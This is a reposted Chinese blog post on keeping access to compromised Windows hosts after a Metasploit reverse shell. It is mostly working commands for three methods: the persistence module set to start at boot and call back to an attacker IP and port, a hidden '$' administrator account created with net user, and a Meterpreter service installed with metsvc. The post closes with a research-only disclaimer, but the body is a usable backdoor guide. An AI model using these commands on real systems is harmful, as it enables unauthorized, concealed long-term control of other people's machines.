当我们获得msf的反弹shell后,会获得一个会话后进行持续控制目标主机,可是当我们与目标主机断开连接后,想下一次继续连接目标主机,就得需要从重新配置msf以获得相应反弹。那么有什么好的方法使得我们的会话更加持久化呢?
使用persistence模块
使用persistence
模块可在目标计算机上安装一个永久性后门,即使有一天目标计算机修补了漏洞,我们仍然可以通过这个连接来实现对目标计算机的控制。设计非常的银杏!
🎨常用参数:
-
-X
开机自启动 -
-i
payload重连的间隔时间 -
-p
反向连接端口号 -
-r
反向连接IP地址
🎃详细帮助
meterpreter > run persistence -h
Meterpreter Script
for
creating a persistent backdoor on a target host.
OPTIONS:
-A Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt> Location
in
target host to write payload to,
if
none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This
help
menu
-i <opt> The interval
in
seconds between each connection attempt
-p <opt> The port on
which
the system running Metasploit is listening
-r <opt> The IP of the system running Metasploit listening
for
the connect back
🍎示例
当我们与目标建立会话后,可以使用下面的命令:
run
persistence -X -i
11
-p
8888
-r
192.168
.5
.88
然后用use exploit/multi/handler
模块设置后进行监听即可。
创建隐藏用户
当我们获取目标主机的远程shell后,通过cmd
或者migrate
对系统进行注入一个隐藏账号。从而神不知鬼不觉的连接到目标主机。具体示例如下:
cmd终端(需要提权,为管理员账号运行cmd)
# 创建用户($符号,可以起到隐藏创建用户的目的)
net
user
test
$ 123456 /add
# 将创建的用户添加到管理员组
net
localgroup administrators
test
$ /add
通过metsvc服务
在获得会话后,可以在msf终端运行run metsvc
,将会在目标主机上以Meterpreter的服务的形式注册在服务列表中,并开机自动自动。运行run metsvc -r
卸载目标主机上的Meterpreter服务。当然,这一步也需要管理员的权限,同时如果目标主机安装了安全软件,在执行命令的时候可能会提示。
总结
以上便是我们在msf
中常用持久化的手段。每种方法都有各自的优势和缺点,要根据实际情况选择恰当的方案。最后表哥温馨提示“渗透不规范,亲人泪两行。”
原文始发于微信公众号(kali黑客笔记):浅谈msf在渗透测试中的持久化
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论